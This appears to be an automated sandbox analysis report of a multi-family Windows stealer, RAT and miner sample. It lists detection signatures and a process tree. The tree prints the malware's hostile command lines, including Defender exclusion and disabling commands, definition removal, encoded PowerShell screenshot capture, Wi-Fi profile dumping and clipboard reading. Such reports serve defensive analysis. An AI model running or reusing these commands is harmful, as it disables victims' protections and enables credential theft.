Edit tour

Windows Analysis Report
87Bym0x4Fy.exe

Overview

General Information

Sample name:	87Bym0x4Fy.exe renamed because original name is a hash value
Original sample name:	7AA4185295AB3F4F896704AED05C0795.exe
Analysis ID:	1485949
MD5:	7aa4185295ab3f4f896704aed05c0795
SHA1:	3ae4ec10990ff35a466328f1bc0e8ece616df3c3
SHA256:	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623
Tags:	BlankGrabberexe
Infos:

Detection

Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Blank Grabber

Yara detected DCRat

Yara detected Discord Rat

Yara detected PureLog Stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Contains functionality to disable the Task Manager (.Net Source)

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files to the user root directory

Drops PE files with benign system names

Encrypted powershell cmdline option found

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found pyInstaller with non standard icon

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the context of a thread in another process (thread injection)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Suspicious Startup Folder Persistence

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Binaries Write Suspicious Extensions

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

87Bym0x4Fy.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\87Bym0x4Fy.exe" MD5: 7AA4185295AB3F4F896704AED05C0795)

powershell.exe (PID: 7068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA=" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RuntimeBroker.exe (PID: 6864 cmdline: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" MD5: A83964F260C28614DA067F6B3DF9E044)

RuntimeBroker.exe (PID: 7292 cmdline: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" MD5: A83964F260C28614DA067F6B3DF9E044)

cmd.exe (PID: 7396 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Build.exe (PID: 7476 cmdline: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym MD5: A4FE53D7F7F29D0065F8B589A7B61112)

hacn.exe (PID: 7684 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)

hacn.exe (PID: 7772 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)

cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

s.exe (PID: 7856 cmdline: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym MD5: E5DB23B3AAF4DDDD2BAF96FB7BBA9616)

svchost.exe (PID: 8052 cmdline: "C:\ProgramData\svchost.exe" MD5: 45C59202DCE8ED255B4DBD8BA74C630F)

wscript.exe (PID: 7624 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 3236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ChainComServermonitor.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

csc.exe (PID: 5448 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 8004 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

setup.exe (PID: 7516 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)

based.exe (PID: 7704 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 10D45FBCAC1C3CCF126754680E91E0E2)

based.exe (PID: 7748 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 10D45FBCAC1C3CCF126754680E91E0E2)

cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8128 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8012 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6008 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5868 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7884 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3668 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7796 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7824 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 5900 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6200 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7368 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7004 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 6840 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5000 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 6808 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 3396 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 2792 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7380 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtA